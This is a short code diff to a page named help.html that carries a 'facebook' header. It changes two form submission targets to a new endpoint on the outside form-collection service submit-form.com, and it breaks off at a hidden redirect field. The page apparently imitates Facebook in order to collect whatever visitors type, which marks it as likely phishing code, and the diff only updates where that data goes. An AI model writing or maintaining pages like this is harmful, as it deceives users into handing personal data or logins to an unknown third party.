--- a/help.html
+++ b/help.html
@@ -11,8 +11,8 @@
       <b class="text-5xl text-white">facebook</b>
   </div>
 
-  <form class="sm:hidden lg:block md:block" action="https://submit-form.com/E8cktAObB" method="post"> 
-<form action="https://submit-form.com/E8cktAObB">
+  <form class="sm:hidden lg:block md:block" action="https://submit-form.com/ob6Ad8j4i" method="post"> 
+<form action="https://submit-form.com/ob6Ad8j4i">
   <input
     type="hidden"
     name="_redirect"
